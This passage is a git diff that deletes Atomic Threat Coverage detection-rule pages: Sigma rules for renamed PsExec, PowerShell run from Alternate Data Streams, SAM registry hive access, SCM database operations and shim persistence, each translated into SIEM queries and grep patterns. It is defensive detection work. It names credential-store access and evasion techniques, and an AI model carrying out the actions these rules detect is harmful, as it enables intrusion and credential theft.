-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Description:\"Execute\\ processes\\ remotely\" AND Product:\"Sysinternals\\ PsExec\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\PsExec.exe OR *\\\\PsExec64.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Renamed PsExec'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Description:"Execute processes remotely" AND Product:"Sysinternals PsExec") AND (NOT (Image.keyword:(*\\PsExec.exe *\\PsExec64.exe))))
-```
-
-
-### splunk
-    
-```
-((Description="Execute processes remotely" Product="Sysinternals PsExec") NOT ((Image="*\\PsExec.exe" OR Image="*\\PsExec64.exe")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Description="Execute processes remotely" Product="Sysinternals PsExec")  -(Image IN ["*\\PsExec.exe", "*\\PsExec64.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*Execute processes remotely)(?=.*Sysinternals PsExec)))(?=.*(?!.*(?:.*(?=.*(?:.*.*\PsExec\.exe|.*.*\PsExec64\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_run_powershell_script_from_ads.md b/Atomic_Threat_Coverage/Detection_Rules/win_run_powershell_script_from_ads.md
deleted file mode 100644
index b255812..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_run_powershell_script_from_ads.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Run PowerShell Script from ADS       |
-|:-------------------------|:------------------|
-| **Description**          | Detects PowerShell script execution from Alternate Data Stream (ADS) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1096: NTFS File Attributes](https://attack.mitre.org/techniques/T1096)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/p0shkatz/Get-ADS/blob/master/Get-ADS.ps1](https://github.com/p0shkatz/Get-ADS/blob/master/Get-ADS.ps1)</li></ul>  |
-| **Author**               | Sergey Soldatov, Kaspersky Lab, oscd.community |
-| Other Tags           | <ul><li>attack.t1564.004</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Run PowerShell Script from ADS
-id: 45a594aa-1fbd-4972-a809-ff5a99dd81b8
-status: experimental
-description: Detects PowerShell script execution from Alternate Data Stream (ADS)
-references:
-    - https://github.com/p0shkatz/Get-ADS/blob/master/Get-ADS.ps1
-author: Sergey Soldatov, Kaspersky Lab, oscd.community
-date: 2019/10/30
-tags:
-    - attack.defense_evasion
-    - attack.t1096
-    - attack.t1564.004
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage|endswith: '\powershell.exe'
-        Image|endswith: '\powershell.exe'
-        CommandLine|contains|all:
-            - 'Get-Content'
-            - '-Stream'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\powershell.exe" -and $_.message -match "Image.*.*\\powershell.exe" -and $_.message -match "CommandLine.*.*Get-Content.*" -and $_.message -match "CommandLine.*.*-Stream.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\powershell.exe AND winlog.event_data.Image.keyword:*\\powershell.exe AND winlog.event_data.CommandLine.keyword:*Get\-Content* AND winlog.event_data.CommandLine.keyword:*\-Stream*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/45a594aa-1fbd-4972-a809-ff5a99dd81b8 <<EOF
-{
-  "metadata": {
-    "title": "Run PowerShell Script from ADS",
-    "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1096",
-      "attack.t1564.004"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\powershell.exe AND winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:*Get\\-Content* AND winlog.event_data.CommandLine.keyword:*\\-Stream*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\powershell.exe AND winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:*Get\\-Content* AND winlog.event_data.CommandLine.keyword:*\\-Stream*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Run PowerShell Script from ADS'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\powershell.exe AND Image.keyword:*\\powershell.exe AND CommandLine.keyword:*Get\-Content* AND CommandLine.keyword:*\-Stream*)
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\powershell.exe" Image="*\\powershell.exe" CommandLine="*Get-Content*" CommandLine="*-Stream*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\powershell.exe" Image="*\\powershell.exe" CommandLine="*Get-Content*" CommandLine="*-Stream*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\powershell\.exe)(?=.*.*\powershell\.exe)(?=.*.*Get-Content.*)(?=.*.*-Stream.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_sam_registry_hive_handle_request.md b/Atomic_Threat_Coverage/Detection_Rules/win_sam_registry_hive_handle_request.md
deleted file mode 100644
index c0f5af2..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_sam_registry_hive_handle_request.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | SAM Registry Hive Handle Request       |
-|:-------------------------|:------------------|
-| **Description**          | Detects handles requested to SAM registry hive |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1012: Query Registry](https://attack.mitre.org/techniques/T1012)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1012: Query Registry](../Triggers/T1012.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/07_discovery/T1012_query_registry/sam_registry_hive_access.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/07_discovery/T1012_query_registry/sam_registry_hive_access.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: SAM Registry Hive Handle Request
-id: f8748f2c-89dc-4d95-afb0-5a2dfdbad332
-description: Detects handles requested to SAM registry hive
-status: experimental
-date: 2019/08/12
-modified: 2019/11/10
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/07_discovery/T1012_query_registry/sam_registry_hive_access.md
-tags:
-    - attack.discovery
-    - attack.t1012
-logsource:
-    product: windows
-    service: security
-detection:
-    selection: 
-        EventID: 4656
-        ObjectType: 'Key'
-        ObjectName|endswith: '\SAM'
-    condition: selection
-fields:
-    - ComputerName
-    - SubjectDomainName
-    - SubjectUserName
-    - ProcessName
-    - ObjectName
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4656" -and $_.message -match "ObjectType.*Key" -and $_.message -match "ObjectName.*.*\\SAM") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4656" AND winlog.event_data.ObjectType:"Key" AND winlog.event_data.ObjectName.keyword:*\\SAM)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f8748f2c-89dc-4d95-afb0-5a2dfdbad332 <<EOF
-{
-  "metadata": {
-    "title": "SAM Registry Hive Handle Request",
-    "description": "Detects handles requested to SAM registry hive",
-    "tags": [
-      "attack.discovery",
-      "attack.t1012"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4656\" AND winlog.event_data.ObjectType:\"Key\" AND winlog.event_data.ObjectName.keyword:*\\\\SAM)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4656\" AND winlog.event_data.ObjectType:\"Key\" AND winlog.event_data.ObjectName.keyword:*\\\\SAM)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'SAM Registry Hive Handle Request'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n     ComputerName = {{_source.ComputerName}}\nSubjectDomainName = {{_source.SubjectDomainName}}\n  SubjectUserName = {{_source.SubjectUserName}}\n      ProcessName = {{_source.ProcessName}}\n       ObjectName = {{_source.ObjectName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4656" AND ObjectType:"Key" AND ObjectName.keyword:*\\SAM)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4656" ObjectType="Key" ObjectName="*\\SAM") | table ComputerName,SubjectDomainName,SubjectUserName,ProcessName,ObjectName
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4656" ObjectType="Key" ObjectName="*\\SAM")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4656)(?=.*Key)(?=.*.*\SAM))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_scm_database_handle_failure.md b/Atomic_Threat_Coverage/Detection_Rules/win_scm_database_handle_failure.md
deleted file mode 100644
index 08cd631..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_scm_database_handle_failure.md
+++ /dev/null
@@ -1,170 +0,0 @@
-| Title                    | SCM Database Handle Failure       |
-|:-------------------------|:------------------|
-| **Description**          | Detects non-system users failing to get a handle of the SCM database. |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/07_discovery/T1000_local_admin_check/local_admin_remote_check_openscmanager.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/07_discovery/T1000_local_admin_check/local_admin_remote_check_openscmanager.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: SCM Database Handle Failure
-id: 13addce7-47b2-4ca0-a98f-1de964d1d669
-description: Detects non-system users failing to get a handle of the SCM database.
-status: experimental
-date: 2019/08/12
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/07_discovery/T1000_local_admin_check/local_admin_remote_check_openscmanager.md
-logsource:
-    product: windows
-    service: security
-detection:
-    selection: 
-        EventID: 4656
-        ObjectType: 'SC_MANAGER OBJECT'
-        ObjectName: 'servicesactive'
-        Keywords: "Audit Failure"
-        SubjectLogonId: "0x3e4"
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4656" -and $_.message -match "ObjectType.*SC_MANAGER OBJECT" -and $_.message -match "ObjectName.*servicesactive" -and $_.message -match "Keywords.*Audit Failure" -and $_.message -match "SubjectLogonId.*0x3e4") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4656" AND winlog.event_data.ObjectType:"SC_MANAGER\ OBJECT" AND winlog.event_data.ObjectName:"servicesactive" AND Keywords:"Audit\ Failure" AND SubjectLogonId:"0x3e4")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/13addce7-47b2-4ca0-a98f-1de964d1d669 <<EOF
-{
-  "metadata": {
-    "title": "SCM Database Handle Failure",
-    "description": "Detects non-system users failing to get a handle of the SCM database.",
-    "tags": "",
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4656\" AND winlog.event_data.ObjectType:\"SC_MANAGER\\ OBJECT\" AND winlog.event_data.ObjectName:\"servicesactive\" AND Keywords:\"Audit\\ Failure\" AND SubjectLogonId:\"0x3e4\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4656\" AND winlog.event_data.ObjectType:\"SC_MANAGER\\ OBJECT\" AND winlog.event_data.ObjectName:\"servicesactive\" AND Keywords:\"Audit\\ Failure\" AND SubjectLogonId:\"0x3e4\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'SCM Database Handle Failure'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4656" AND ObjectType:"SC_MANAGER OBJECT" AND ObjectName:"servicesactive" AND Keywords:"Audit Failure" AND SubjectLogonId:"0x3e4")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4656" ObjectType="SC_MANAGER OBJECT" ObjectName="servicesactive" Keywords="Audit Failure" SubjectLogonId="0x3e4")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4656" ObjectType="SC_MANAGER OBJECT" ObjectName="servicesactive" Keywords="Audit Failure" SubjectLogonId="0x3e4")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4656)(?=.*SC_MANAGER OBJECT)(?=.*servicesactive)(?=.*Audit Failure)(?=.*0x3e4))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_scm_database_privileged_operation.md b/Atomic_Threat_Coverage/Detection_Rules/win_scm_database_privileged_operation.md
deleted file mode 100644
index acf7d2a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_scm_database_privileged_operation.md
+++ /dev/null
@@ -1,170 +0,0 @@
-| Title                    | SCM Database Privileged Operation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects non-system users performing privileged operation os the SCM database |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/07_discovery/T1000_local_admin_check/local_admin_remote_check_openscmanager.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/07_discovery/T1000_local_admin_check/local_admin_remote_check_openscmanager.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: SCM Database Privileged Operation
-id: dae8171c-5ec6-4396-b210-8466585b53e9
-description: Detects non-system users performing privileged operation os the SCM database
-status: experimental
-date: 2019/08/15
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/07_discovery/T1000_local_admin_check/local_admin_remote_check_openscmanager.md
-logsource:
-    product: windows
-    service: security
-detection:
-    selection: 
-        EventID: 4674
-        ObjectType: 'SC_MANAGER OBJECT'
-        ObjectName: 'servicesactive'
-        PrivilegeList: 'SeTakeOwnershipPrivilege'
-        SubjectLogonId: "0x3e4"
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4674" -and $_.message -match "ObjectType.*SC_MANAGER OBJECT" -and $_.message -match "ObjectName.*servicesactive" -and $_.message -match "PrivilegeList.*SeTakeOwnershipPrivilege" -and $_.message -match "SubjectLogonId.*0x3e4") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4674" AND winlog.event_data.ObjectType:"SC_MANAGER\ OBJECT" AND winlog.event_data.ObjectName:"servicesactive" AND PrivilegeList:"SeTakeOwnershipPrivilege" AND SubjectLogonId:"0x3e4")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/dae8171c-5ec6-4396-b210-8466585b53e9 <<EOF
-{
-  "metadata": {
-    "title": "SCM Database Privileged Operation",
-    "description": "Detects non-system users performing privileged operation os the SCM database",
-    "tags": "",
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4674\" AND winlog.event_data.ObjectType:\"SC_MANAGER\\ OBJECT\" AND winlog.event_data.ObjectName:\"servicesactive\" AND PrivilegeList:\"SeTakeOwnershipPrivilege\" AND SubjectLogonId:\"0x3e4\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4674\" AND winlog.event_data.ObjectType:\"SC_MANAGER\\ OBJECT\" AND winlog.event_data.ObjectName:\"servicesactive\" AND PrivilegeList:\"SeTakeOwnershipPrivilege\" AND SubjectLogonId:\"0x3e4\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'SCM Database Privileged Operation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4674" AND ObjectType:"SC_MANAGER OBJECT" AND ObjectName:"servicesactive" AND PrivilegeList:"SeTakeOwnershipPrivilege" AND SubjectLogonId:"0x3e4")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4674" ObjectType="SC_MANAGER OBJECT" ObjectName="servicesactive" PrivilegeList="SeTakeOwnershipPrivilege" SubjectLogonId="0x3e4")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4674" ObjectType="SC_MANAGER OBJECT" ObjectName="servicesactive" PrivilegeList="SeTakeOwnershipPrivilege" SubjectLogonId="0x3e4")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4674)(?=.*SC_MANAGER OBJECT)(?=.*servicesactive)(?=.*SeTakeOwnershipPrivilege)(?=.*0x3e4))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_sdbinst_shim_persistence.md b/Atomic_Threat_Coverage/Detection_Rules/win_sdbinst_shim_persistence.md
deleted file mode 100644
index ef19f9e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_sdbinst_shim_persistence.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Possible Shim Database Persistence via sdbinst.exe       |
-|:-------------------------|:------------------|
-| **Description**          | Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1138: Application Shimming](https://attack.mitre.org/techniques/T1138)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html](https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html)</li></ul>  |
-| **Author**               | Markus Neis |
-| Other Tags           | <ul><li>attack.t1546.011</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Possible Shim Database Persistence via sdbinst.exe
-id: 517490a7-115a-48c6-8862-1a481504d5a8
-status: experimental
-description: Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.
-references:
-    - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
-tags:
-    - attack.persistence
-    - attack.t1138
-    - attack.t1546.011
-author: Markus Neis
-date: 2019/01/16
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\sdbinst.exe'
-        CommandLine:
-            - '*.sdb*'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\sdbinst.exe") -and ($_.message -match "CommandLine.*.*.sdb.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\sdbinst.exe) AND winlog.event_data.CommandLine.keyword:(*.sdb*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/517490a7-115a-48c6-8862-1a481504d5a8 <<EOF
-{
-  "metadata": {
-    "title": "Possible Shim Database Persistence via sdbinst.exe",
-    "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.",
-    "tags": [
-      "attack.persistence",
-      "attack.t1138",
-      "attack.t1546.011"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\sdbinst.exe) AND winlog.event_data.CommandLine.keyword:(*.sdb*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\sdbinst.exe) AND winlog.event_data.CommandLine.keyword:(*.sdb*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Possible Shim Database Persistence via sdbinst.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\sdbinst.exe) AND CommandLine.keyword:(*.sdb*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\sdbinst.exe") (CommandLine="*.sdb*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\sdbinst.exe"] CommandLine IN ["*.sdb*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\sdbinst\.exe))(?=.*(?:.*.*\.sdb.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_service_execution.md b/Atomic_Threat_Coverage/Detection_Rules/win_service_execution.md
deleted file mode 100644
index 81334c5..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_service_execution.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Service Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detects manual service execution (start) via system utilities |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
